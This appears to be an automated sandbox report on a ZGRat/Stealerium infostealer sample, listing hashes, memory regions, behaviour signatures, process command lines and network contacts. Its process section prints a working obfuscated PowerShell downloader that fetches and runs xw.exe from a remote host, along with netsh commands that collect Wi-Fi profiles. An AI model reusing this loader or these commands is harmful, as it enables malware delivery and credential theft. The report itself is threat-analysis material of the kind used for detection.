| SHA512 | af133b667e92cdab4e352b4c86ea7e8986ea9de5e25e61da92a61abe59adb11435d1e44d7e54974c2969c046db1fe1b411186b1578c147829cbb2d5693ffe35c |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
memory/1540-1220-0x0000000007240000-0x00000000072F2000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Debug.txt
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
memory/1540-1222-0x00000000071D0000-0x00000000071F2000-memory.dmp
memory/1540-1223-0x0000000008930000-0x0000000008C84000-memory.dmp
memory/1540-1225-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/1540-1226-0x00000000057C0000-0x00000000057D0000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\msgid.dat
| MD5 | 13272090fc49070d4c79f78670b7839b |
| SHA1 | 4ea6e614dd113ed7bb5e291537ceed50154f5042 |
| SHA256 | bc91f49e63aa1e5f230c79de3f60aeae2b561531e263e0799efe03b3bb407c84 |
| SHA512 | 27ffb2c8e2a1af82b4ca472eb1a17221ef73f957a79403cf575c749f82aadc57766191076f2da4eee02d4db5785f0d9180294fc3c32a4f98d5fa91549c1e5d4a |
memory/1540-1237-0x0000000007AF0000-0x0000000007AFA000-memory.dmp
memory/1540-1238-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/1540-1239-0x00000000057C0000-0x00000000057D0000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealerium
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1012 set thread context of 3080 | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | C:\Users\Admin\AppData\Roaming\xw.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTkshkQ($cDGZfk, $yzmbgckKGbazEIn){[IO.File]::WriteAllBytes($cDGZfk, $yzmbgckKGbazEIn)};function TkuLTlapXaFtTtwV($cDGZfk){if($cDGZfk.EndsWith((iyCVHkkuB @(46364,46418,46426,46426))) -eq $True){rundll32.exe $cDGZfk }elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46430,46433,46367))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $cDGZfk}elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46427,46433,46423))) -eq $True){misexec /qn /i $cDGZfk}else{Start-Process $cDGZfk}};function DTKsKtcccITMNLzYJ($OBbjRQJFrABngjzzKQR){$QxNgcQqldJUnDwxVjTSlD = New-Object (iyCVHkkuB @(46396,46419,46434,46364,46405,46419,46416,46385,46426,46423,46419,46428,46434));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yzmbgckKGbazEIn = $QxNgcQqldJUnDwxVjTSlD.DownloadData($OBbjRQJFrABngjzzKQR);return $yzmbgckKGbazEIn};function iyCVHkkuB($BmSsapwYTMD){$uhHMB=46318;$UzSaffw=$Null;foreach($WNyqiOQgreOPKu in $BmSsapwYTMD){$UzSaffw+=[char]($WNyqiOQgreOPKu-$uhHMB)};return $UzSaffw};function nBauMKwRs(){$WplUOTzLXWqwfc = $env:AppData + '\';$flgGVgp = $WplUOTzLXWqwfc + 'xw.exe'; if (Test-Path -Path $flgGVgp){TkuLTlapXaFtTtwV $flgGVgp;}Else{ $hkhkBA = DTKsKtcccITMNLzYJ (iyCVHkkuB @(46422,46434,46434,46430,46433,46376,46365,46365,46427,46415,46421,46423,46417,46364,46430,46429,46423,46433,46429,46428,46434,46429,46429,46426,46440,46364,46417,46429,46427,46365,46438,46437,46364,46419,46438,46419));QTkshkQ $flgGVgp $hkhkBA;TkuLTlapXaFtTtwV $flgGVgp;};;;;}nBauMKwRs;
C:\Users\Admin\AppData\Roaming\xw.exe
"C:\Users\Admin\AppData\Roaming\xw.exe"
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 13.95.31.18:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.77.160.28:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| N/A | 162.159.134.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.114.97:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 152.199.19.74:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.231.121.79:80 | tcp | |
| N/A | 104.18.114.97:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 151.80.29.83:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 31.14.70.246:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.18.114.97:80 | tcp | |
| N/A | 162.159.134.233:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 10.73.50.20.in-addr.arpa | udp |
Files
memory/4284-1-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/4284-2-0x0000000002BE0000-0x0000000002BF0000-memory.dmp
memory/4284-3-0x0000000002BE0000-0x0000000002BF0000-memory.dmp
memory/4284-0-0x0000000002B70000-0x0000000002BA6000-memory.dmp
memory/4284-4-0x0000000005840000-0x0000000005E68000-memory.dmp
memory/4284-5-0x00000000055F0000-0x0000000005612000-memory.dmp
memory/4284-6-0x0000000005790000-0x00000000057F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scy4e343.033.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4284-7-0x0000000005E70000-0x0000000005ED6000-memory.dmp
memory/4284-17-0x0000000005FE0000-0x0000000006334000-memory.dmp
memory/4284-18-0x00000000064B0000-0x00000000064CE000-memory.dmp
memory/4284-19-0x00000000064F0000-0x000000000653C000-memory.dmp
memory/4284-20-0x0000000002BE0000-0x0000000002BF0000-memory.dmp
memory/4284-22-0x00000000069E0000-0x00000000069FA000-memory.dmp
memory/4284-23-0x0000000006A50000-0x0000000006A72000-memory.dmp
memory/4284-24-0x0000000007CC0000-0x0000000008264000-memory.dmp
memory/4284-21-0x0000000007670000-0x0000000007706000-memory.dmp
memory/4284-25-0x00000000088F0000-0x0000000008F6A000-memory.dmp
C:\Users\Admin\AppData\Roaming\xw.exe
| MD5 | eef7a52c4e6fc20cd22306b007b9b4c0 |
| SHA1 | 700f935a3e75a0001654fae0b4d30af5044329c0 |
| SHA256 | 1e5f96939d4d1af801f771de3da5e285c0c7dc4b376dfc127b7320926d0e0444 |
| SHA512 | 4459e6f019a906c13bd41dc3664e0dc4567b8cd941712ecd79e3888fadce517ac640767f80d92fbc57963da5b8e648e1f6a6ec13efe1f37f3bc21b672ac70c70 |
C:\Users\Admin\AppData\Roaming\xw.exe
| MD5 | e6ccb03a4cd3aa39359361eae696ab9b |
| SHA1 | ac58548d25dee7cc1c6f6b6eff1d53fabfc0aab3 |
| SHA256 | 7cc9da41083cd2640ef63e8190fa4d426e9d03a930348d3dbbcb4074f39e91ba |
| SHA512 | 4e4ee151f1104cc1511b02d8140287b0c489bd21f1491f7b9f0229a31091572e211bcee98f3ec0dc29d8bb0169327b7063ad1a376918548f51aba32931b138cd |
memory/1012-37-0x0000000000A90000-0x0000000000A9E000-memory.dmp
memory/4284-42-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/1012-41-0x00000000053F0000-0x0000000005400000-memory.dmp
memory/1012-40-0x00000000714D0000-0x0000000071C80000-memory.dmp
C:\Users\Admin\AppData\Roaming\xw.exe
| MD5 | 041d958d503620fcee33aab200c8e17a |
| SHA1 | 6e6b21612723294622356d6897968faa05439b81 |
| SHA256 | 1f84a7ebd0887401a73b3152d38b4ac6dd5b5203189744a645ca59c3e3f4dbfb |
| SHA512 | f6ce0c7d592b5dd8c47fc5eded575be3ac74bb5ad874dfef8091fdbbf957487a0e74be68f229dd2849ec82b7479ec539043cea05687525af0849cbd879dce181 |
memory/1012-43-0x0000000008140000-0x00000000086A8000-memory.dmp
memory/1012-44-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-45-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-47-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-49-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-51-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-53-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-55-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-57-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-59-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-61-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-65-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-63-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-67-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-69-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-71-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-73-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-75-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-77-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-79-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-81-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-83-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-85-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-87-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-89-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-91-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-93-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-95-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-97-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-99-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-101-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-103-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-105-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-107-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-976-0x0000000004D80000-0x0000000004D81000-memory.dmp
memory/1012-977-0x00000000089F0000-0x0000000008EF0000-memory.dmp
memory/1012-978-0x0000000006D00000-0x0000000006D4C000-memory.dmp
C:\Users\Admin\AppData\Roaming\xw.exe
| MD5 | 9b5571670ab852ab22ef3810cfd70159 |
| SHA1 | 8c7972a29379b57f9e40d8b7af796eb938cf8670 |
| SHA256 | 6e1a3a18373c5b55d3dd1e75c210bb15ede6de748c3b88af5858120144558ab1 |
| SHA512 | 01e593ae4febe272b7f3fc303ba130797e1d36335716627ebd667d8c347302ca17d252f2cda37a6cb15906c12ba8c103e480b8a2ce97290a81cea500bb66a092 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xw.exe.log
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1012-985-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3080-987-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3080-986-0x0000000000400000-0x0000000000C0A000-memory.dmp
memory/3080-988-0x0000000005610000-0x00000000056A2000-memory.dmp
memory/3080-990-0x00000000055C0000-0x00000000055CA000-memory.dmp
memory/3080-989-0x0000000005790000-0x00000000057A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | f37938f3bb58f159e1d46403c6e0b10a |
| SHA1 | 78948994aa6c388b4356ee1eeb94b20cdfcda845 |
| SHA256 | 634a0173ea818d5b152fcfbd8cc4b5d05fb381dac744b251a7b0184b2d7ddac8 |
| SHA512 | 6345f8f659fbcd16bb9f42cb68270f9ab275a76ba0acc74cb55a1d6c1bfade06c0cf1d2fbd6b671cb0445869714a19bb8d08ac71ca57fdd21a941fe0b28773a5 |
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | a90e4f6bdd44a71e2246160693884539 |
| SHA1 | 940ebec474e0b4d87dc4f06f37a1d32d2315cf56 |
| SHA256 | b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4 |
| SHA512 | 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937 |
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | d1aa9832a89fcef4fe32df07d43736c0 |
| SHA1 | 75b1fd07a8a8935cfa8ab8fa816aebddbeefd1c5 |
| SHA256 | c82c8c416aec3df58bab4ec5b133a7a7ce2a64766c3ba7eab9d33e86be58a4ce |
| SHA512 | bca7f2a3f5d4316cc96d73887ba350cc44fda87eaf609c535cf2eb91cc62bc04003303034bead8f759b531bc3b565d515d731584d64282d273a81c56ec1a9a84 |
memory/3144-1020-0x0000000000BD0000-0x0000000000D62000-memory.dmp
memory/3732-1021-0x00007FF9A8820000-0x00007FF9A92E1000-memory.dmp
memory/3080-1022-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3144-1023-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3732-1024-0x000001B3F36C0000-0x000001B3F36D0000-memory.dmp
memory/3732-1019-0x000001B3D8E70000-0x000001B3D8FE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | ce008446a6fa668f1482d5dbf86db7a5 |
| SHA1 | e44d92971edbeb71bfd53e38b2d5dd31fe0dc216 |
| SHA256 | b8cf553f561a7594907f7407c23d79b21c175472f56a5bc55a377c6f3c908d4d |
| SHA512 | 980c5a16696eabe5f1c660750be914cd2df4e72111a416ad1d53efd8cb29852b64d5ffdb4e5286543aaa3b76ba599243f768c6338f23af0163dea9107e4cdd6d |
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | dd87528a716d48530d8cc7fe6bec3386 |
| SHA1 | 89351d5b60846912f216acb58219397fc1ca9aee |
| SHA256 | eb2b5d61c9a6d7e26f81da14df0c063fb2c71ba294389fce6076a0ae52356244 |
| SHA512 | 9f203bbb162250aab7cd643ac72f430ddd761c063d5a2fd6fd03cdf7707a6e6c287bfeba4b675d4173c92641573313d5f765afefa0c3d159e196542b10d6b861 |
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | 45ea343e335d2d6400ccbc1e3fc85f11 |
| SHA1 | 7f2267d1f27a076e284696c30a4cf4768fd1a52f |
| SHA256 | f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203 |
| SHA512 | c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1 |
memory/3732-1026-0x000001B3F3950000-0x000001B3F39A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt
| MD5 | 412ec159e4b14be1ca93db473e80acc2 |
| SHA1 | 8909b6f7fc8715a749270b6ceb8f05f823f59fd3 |
| SHA256 | eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe |
| SHA512 | a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4 |
C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt
| MD5 | 6be6fdca0cfa94635b8689b2b0bf2bee |
| SHA1 | 379c61029b5443c3d3df7c770423e40618b36d15 |
| SHA256 | 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb |
| SHA512 | 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8 |
memory/3144-1059-0x00000000055A0000-0x00000000055B0000-memory.dmp
memory/3732-1068-0x00007FF9A8820000-0x00007FF9A92E1000-memory.dmp
memory/3144-1071-0x0000000005E40000-0x0000000005ED2000-memory.dmp
memory/3144-1073-0x0000000005F00000-0x0000000005F08000-memory.dmp
memory/3144-1072-0x0000000005ED0000-0x0000000005EF6000-memory.dmp
memory/3144-1075-0x0000000006E90000-0x0000000006E98000-memory.dmp
memory/3144-1076-0x0000000006EB0000-0x0000000006ECE000-memory.dmp
memory/3144-1074-0x0000000006E80000-0x0000000006E8A000-memory.dmp
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Process.txt
| MD5 | d162920ec27ea267235b5216d6701181 |
| SHA1 | ef91540d216bead782f55da51239c2682dc7b71d |
| SHA256 | c3f4acbecdd4feb212db3fac658cb531876ae23929b76cb49d35285409a224fd |
| SHA512 | 7e671cbc520856770e202e379979db04665b69c770ee984c36f5f2e5bb7a5c110400f7db99164f50c88762f141a104e769493b8765a9148108f750a0ba1567a4 |
